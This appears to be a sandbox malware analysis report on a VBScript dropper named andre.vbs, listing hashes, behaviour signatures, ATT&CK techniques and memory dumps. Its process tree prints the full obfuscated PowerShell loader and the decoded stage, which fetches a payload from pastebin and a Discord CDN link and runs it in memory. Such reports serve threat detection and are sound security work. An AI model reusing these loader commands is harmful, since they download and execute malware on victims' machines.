5f83bd11e7e0793094390d82400b3d1a4c44bf5df39ddbb7c7fcfa5be989d7b2

General

Target

andre.vbs
Size

1.6MB
MD5

ff2c142459d0557e5e09c92f5a6b9716
SHA1

90e68403ae9a08b068c5dda339893ccdfac69fd7
SHA256

5f83bd11e7e0793094390d82400b3d1a4c44bf5df39ddbb7c7fcfa5be989d7b2
SHA512

5a697d38a128e0922715b52d182f065ca6f8297b2d4a499659bdfa1f1c5675780ad3b28b0d291c619d14b27d595ec1eb2a3f6204c6c28e3ed75ed69ea70b8a93
SSDEEP

192:9PmPPPPmPPPPPPGPmPPPPmPPPPPPGPmPPPPmPPPPPPGPmPPPPmPPPPPPGPmPPPPX:VHGslc2NNArH

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://pastebin.com/raw/V9y5Q5vv

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
5	2112	powershell.exe
6	2112	powershell.exe
8	2112	powershell.exe
9	2112	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2112	powershell.exe
2292	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
9	bitbucket.org
4	pastebin.com
6	pastebin.com
7	bitbucket.org
8	bitbucket.org

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2292	powershell.exe
2112	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2292	powershell.exe
Token: SeDebugPrivilege	2112	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2944 wrote to memory of 2292	2944	WScript.exe	28
PID 2944 wrote to memory of 2292	2944	WScript.exe	28
PID 2944 wrote to memory of 2292	2944	WScript.exe	28
PID 2292 wrote to memory of 2112	2292	powershell.exe	30
PID 2292 wrote to memory of 2112	2292	powershell.exe	30
PID 2292 wrote to memory of 2112	2292	powershell.exe	30

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\andre.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2944
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆B1☆GU☆dwBp☆GI☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆HU☆YgBs☆Gw☆dQ☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBy☆HY☆ZQBy☆EM☆ZQBy☆HQ☆aQBm☆Gk☆YwBh☆HQ☆ZQBW☆GE☆b☆Bp☆GQ☆YQB0☆Gk☆bwBu☆EM☆YQBs☆Gw☆YgBh☆GM☆aw☆g☆D0☆I☆B7☆CQ☆d☆By☆HU☆ZQB9☆Ds☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆HI☆dgBp☆GM☆ZQBQ☆G8☆aQBu☆HQ☆TQBh☆G4☆YQBn☆GU☆cgBd☆Do☆OgBT☆GU☆YwB1☆HI☆aQB0☆Hk☆U☆By☆G8☆d☆Bv☆GM☆bwBs☆C☆☆PQ☆g☆Fs☆UwB5☆HM☆d☆Bl☆G0☆LgBO☆GU☆d☆☆u☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆V☆B5☆H☆☆ZQBd☆Do☆OgBU☆Gw☆cw☆x☆DI☆OwBb☆EI☆eQB0☆GU☆WwBd☆F0☆I☆☆k☆HY☆e☆By☆HU☆dQ☆g☆D0☆I☆Bb☆HM☆eQBz☆HQ☆ZQBt☆C4☆QwBv☆G4☆dgBl☆HI☆d☆Bd☆Do☆OgBG☆HI☆bwBt☆EI☆YQBz☆GU☆Ng☆0☆FM☆d☆By☆Gk☆bgBn☆Cg☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆Cc☆a☆B0☆HQ☆c☆☆6☆C8☆LwBw☆GE☆cwB0☆GU☆YgBp☆G4☆LgBj☆G8☆bQ☆v☆HI☆YQB3☆C8☆Vg☆5☆Hk☆NQBR☆DU☆dgB2☆Cc☆KQ☆g☆Ck☆I☆☆p☆Ds☆WwBz☆Hk☆cwB0☆GU☆bQ☆u☆EE☆c☆Bw☆EQ☆bwBt☆GE☆aQBu☆F0☆Og☆6☆EM☆dQBy☆HI☆ZQBu☆HQ☆R☆Bv☆G0☆YQBp☆G4☆LgBM☆G8☆YQBk☆Cg☆J☆B2☆Hg☆cgB1☆HU☆KQ☆u☆Ec☆ZQB0☆FQ☆eQBw☆GU☆K☆☆n☆FQ☆ZQBo☆HU☆b☆Bj☆Gg☆ZQBz☆Fg☆e☆BY☆Hg☆e☆☆u☆EM☆b☆Bh☆HM☆cw☆x☆Cc☆KQ☆u☆Ec☆ZQB0☆E0☆ZQB0☆Gg☆bwBk☆Cg☆JwBN☆HM☆cQBC☆Ek☆YgBZ☆Cc☆KQ☆u☆Ek☆bgB2☆G8☆awBl☆Cg☆J☆Bu☆HU☆b☆Bs☆Cw☆I☆Bb☆G8☆YgBq☆GU☆YwB0☆Fs☆XQBd☆C☆☆K☆☆n☆CY☆ZgBi☆Dc☆Mw☆w☆DU☆Mw☆w☆DU☆M☆☆x☆GE☆YQBi☆GI☆M☆☆2☆Dc☆OQ☆2☆Dc☆Yg☆2☆DY☆O☆☆z☆GI☆O☆☆w☆DQ☆N☆☆4☆GU☆Z☆☆1☆Dg☆Mg☆5☆GY☆N☆☆4☆GI☆MQBl☆DM☆Yw☆4☆GQ☆M☆Bl☆GY☆Mw☆2☆DY☆Mw☆y☆DE☆O☆☆0☆DE☆ZQ☆1☆GI☆Ng☆9☆G0☆a☆☆m☆Dc☆YgBk☆D☆☆N☆Bm☆DY☆Ng☆9☆HM☆aQ☆m☆Dc☆MwBm☆DU☆NQBm☆DY☆Ng☆9☆Hg☆ZQ☆/☆HQ☆e☆B0☆C4☆OQ☆w☆DU☆MgBz☆G8☆Uw☆v☆Dk☆NQ☆5☆DU☆M☆☆y☆DU☆OQ☆4☆DM☆O☆☆4☆Dk☆O☆☆0☆Dg☆O☆☆y☆DE☆Lw☆2☆DE☆O☆☆z☆D☆☆MQ☆5☆DE☆O☆☆4☆DI☆O☆☆0☆DY☆Mw☆1☆DE☆Mg☆x☆C8☆cwB0☆G4☆ZQBt☆Gg☆YwBh☆HQ☆d☆Bh☆C8☆bQBv☆GM☆LgBw☆H☆☆YQBk☆HI☆bwBj☆HM☆aQBk☆C4☆bgBk☆GM☆Lw☆v☆Do☆cwBw☆HQ☆d☆Bo☆Cc☆I☆☆s☆C☆☆J☆B1☆GI☆b☆Bs☆HU☆I☆☆s☆C☆☆JwBf☆F8☆XwBf☆F8☆dQBq☆HM☆d☆Bn☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆C0☆LQ☆t☆C0☆LQ☆t☆C0☆Jw☆s☆C☆☆J☆B1☆GU☆dwBp☆GI☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\andre.vbs');powershell $KByHL;
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2292
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$uewib = '0';$ubllu = 'C:\Users\Admin\AppData\Local\Temp\andre.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $vxruu = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($vxruu).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&fb730530501aabb067967b6683b80448ed5829f48b1e3c8d0ef366321841e5b6=mh&7bd04f66=si&73f55f66=xe?txt.9052soS/9595025983889848821/6183019188284635121/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $ubllu , '_____ujstg_______________________________________-------', $uewib, '1', 'Roda' ));"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2112

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8FZHS74RQM63RG5H5YPR.temp

Filesize
7KB

MD5
495aa136c715ee0208c299b0d23428f5

SHA1
224942a1ec266574c33ecffcf84c1aa000f9460f

SHA256
89504da0b100eedca62c2f3865f97a6cfe3d4d7a0bcc21a7fc2231def918816b

SHA512
6f1f423004e27120ab46d0ca050b63899754392d61f1cdc51eacbfa5a423dd7cb9cc78e183bf816dd4730b5393a04df68d9a8d6b874775415ed5fe7e1b684407

Download Submit
memory/2292-11-0x000007FEF5290000-0x000007FEF5C2D000-memory.dmp

Filesize
9.6MB

Download
memory/2292-10-0x000007FEF5290000-0x000007FEF5C2D000-memory.dmp

Filesize
9.6MB

Download
memory/2292-9-0x000007FEF5290000-0x000007FEF5C2D000-memory.dmp

Filesize
9.6MB

Download
memory/2292-8-0x000007FEF5290000-0x000007FEF5C2D000-memory.dmp

Filesize
9.6MB

Download
memory/2292-7-0x000007FEF5290000-0x000007FEF5C2D000-memory.dmp

Filesize
9.6MB

Download
memory/2292-6-0x0000000001E10000-0x0000000001E18000-memory.dmp

Filesize
32KB

Download
memory/2292-5-0x000000001B570000-0x000000001B852000-memory.dmp

Filesize
2.9MB

Download
memory/2292-4-0x000007FEF554E000-0x000007FEF554F000-memory.dmp

Filesize
4KB

Download
memory/2292-17-0x000007FEF5290000-0x000007FEF5C2D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing